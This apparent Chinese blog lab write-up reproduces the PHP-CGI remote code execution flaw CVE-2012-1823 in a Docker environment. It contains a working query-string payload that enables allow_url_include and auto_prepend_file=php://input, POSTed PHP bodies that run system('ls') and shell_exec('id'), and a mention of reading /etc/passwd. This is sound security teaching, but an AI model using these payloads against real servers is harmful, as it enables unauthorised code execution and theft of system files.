PHP-CGI远程代码执行漏洞CVE-2012-1823复现

最新推荐文章于 2024-08-12 10:11:14 发布
最新推荐文章于 2024-08-12 10:11:14 发布
阅读量1k 收藏 5
点赞数 1
分类专栏: 渗透测试 文章标签: 渗透测试 php 安全 ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56123950/article/details/117982623
版权

目录

CVE-2012-1823

漏洞原因

用户请求的querystring被作为了php-cgi的参数执行了,命令行参数不仅可以通过#!/usr/local/bin/php-cgi -d include_path=/path的方式传入php-cgi,还可以通过querystring的方式传入。

影响版本

< php-5.3.12 or php < 5.4.2
mod方式、fpm方式不受影响

漏洞利用

cgi模式下的参数

-c 指定php.ini文件的位置
-n 不要加载php.ini文件
-d 指定配置项
-b 启动fastcgi进程
-s 显示文件源码
-T 执行指定次该文件
-h和-? 显示帮助

开启实验环境
 sudo docker-compose bulid
 sudo docker-compose up -d

在这里插入图片描述
在这里插入图片描述
然后ifconfig查看ip地址
在这里插入图片描述

访问网站

该站点在8080端口,直接访问
在这里插入图片描述
在后面加上-s,可发现返回源码,则说明存在此漏洞
在这里插入图片描述

制造漏洞

执行代码

用burpsuit抓post请求的数据包,然后修改数据包,可以php远程代码执行
我们先打开burpsuit,抓到数据包,传到repeater里
在这里插入图片描述
制作文件包含漏洞

-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input


<?php echo system("ls"); ?>

插入代码将GET请求方式改为POST,发送数据包,成功执行。
在这里插入图片描述
还可以返回id值

<?php echo shell_exec("id"); ?>

在这里插入图片描述
查看对方的/etc/passwd的文件
在这里插入图片描述

移除漏洞环境

不要离开当前目录,漏洞测试结束后,执行如下命令移除环境

sudo docker-compose down
从不专注的人
关注
专栏目录
PHP-CGI远程代码执行漏洞CVE-2012-1823
千寻的博客
03-06 1265
就是用户请求的`querystring`(`querystring`字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是指http请求中所带的数据)被作为了`php-cgi`的参数,最终导致了一系列结果。
PHP-CGI远程代码执行漏洞分析与防范
10-19
PHP-CGI远程代码执行漏洞CVE-2012-1823)是一个严重的安全漏洞,它允许远程攻击者通过构造特殊的HTTP请求,执行任意PHP代码。这个漏洞主要影响以CGI模式运行的PHP,而以FastCGI模式运行的PHP-FPM不受影响。之所以...
CVE-2012-1823 漏洞复现
Jay17的博客
02-10 1718
CVE-2012-1823 漏洞复现
漏洞复现-PHP-CGI Windows平台远程代码执行漏洞CVE-2024-4577)
最新发布
玄道的网安博客
08-12 996
语言在设计时忽略了Windows系统内部对字符编码转换的Best-Fit特性,当PHP运行在Window平台且使用了如繁体中文(代码页950)、简体中文(代码页936)和日文(代码页932)等语系时,威胁者可构造恶意请求绕过CVE-2012-1823的保护,通过参数注入等攻击在目标PHP服务器上远程执行代码。结合上面的特性,你可以通过传%ad来传入一个"-",这样在-之后的部分就会成为php-cgi的参数。只有php-cgi.exe是granted的,我们把视角还是回到php-cgi上。
CVE-2012-1823PHP-CGI远程代码执行漏洞(80端口)
m0_62670778的博客
05-12 723
php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了fastcgi
PHP反序列化漏洞CGI远程代码执行漏洞
LCW991207的博客
08-17 587
CVE-2012-1823就是php-cgi这个sapi出现的漏洞,本漏洞只出现在以cgi模式运行的php中。
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
做自己喜欢的事,并将其发挥到极致!
06-11 2170
PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登陆的情况下执行任意PHP代码
PHP-CGI远程代码执行漏洞
weixin_69925635的博客
07-18 681
使用kali-msf6对ubuntuphp-CGI漏洞攻击
phpcgi 代码执行 (CVE-2012-1823) 复现
m0_49936858的博客
08-22 582
CGI全称是“通用网关接口”(Common Gateway Interface), 它可以让一个客户端,从网页浏览器向执行在Web服务器上的程序请求数据 这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是只http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。可见,获取querystring后进行解码,如果第一个字符是-则设置skip_getopt,也就是不要获取命令行参数。
漏洞复现CVE-2012-1823PHP-CGI远程代码执行
ASD830的博客
06-18 507
发现flag,查看即可得到flag{32a52c19-c1db-4479-ac54-ab59d8d45977}可以发现其php版本为5.4.1,而且可以看到一个cve字样:cve20121823。得到index.php和info.php,使用cat命令查看一下index.php。提示我们这里没什么东西,我们猜测flag可能在根目录下,目录穿越一下。接着我们使用-d 指定配置项,这里我们可以结合post请求执行命令。发现info.php,直接访问/info.php。首先我们使用-s命令查看一下源代码
cve-2012-1823漏洞复现
m0_74402888的博客
04-28 701
CVE-2012-1823就是存在于以cgi模式运行的php中, 本质是用户请求的参数被作为了php-cgi的参数。cgi:它是一种协议。通过cgi协议,web server可以将动态请求和相关参数发送给专门处理动态内容的应用程序。
IIS7限制PHP-CGI.exe数量_服务器php-cgi.exe进程过多,导致CPU占用100%的解决
weixin_39840733的博客
03-09 695
1、检查系统盘空间。查看系统临时文件是否过多,mysql数据库的临时文件默认存到了c:/windows/temp,导致累积了几万甚至上百万的小文件,压垮系统盘。del *.* 删除所有文件2、在IIS中并没有内置对PHP语言的支持,使用PHP,必须自行安装。PHP可以安装为CGI模式或者ISAPI模式,由于ISAPI模式具有更高的性能,建议大家使用ISAPI模式。3、如能修改程序,建议将程序配置文...
php-cgi 攻击,PHP安全之以CGI 模式安装时可能遇到的攻击及解决办法
weixin_39929687的博客
03-27 404
情形一:只运行公开的文件如果 web 服务器中所有内容都受到密码或 IP 地址的访问限制,就不需要设置这些选项。如果 web 服务器不支持重定向,或者 web 服务器不能和 PHP 通信而使访问请求变得更为安全,可以在 configure 脚本中指定--enable-force-cgi-redirect选项。除此之外,还要确认 PHP 程序不依赖其它方式调用,比如通过直接的http://my...
Apache Unomi 1.5.2以下版本面临CVE-2020-13942远程代码执行漏洞
"CVE-2020-13942 是一个针对Apache Unomi的严重安全漏洞,涉及远程代码执行(Remote Code Execution, RCE)风险。Apache Unomi 是一款开源的事件管理和分析平台,用于收集、处理和分析应用程序的日志和事件数据。这...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值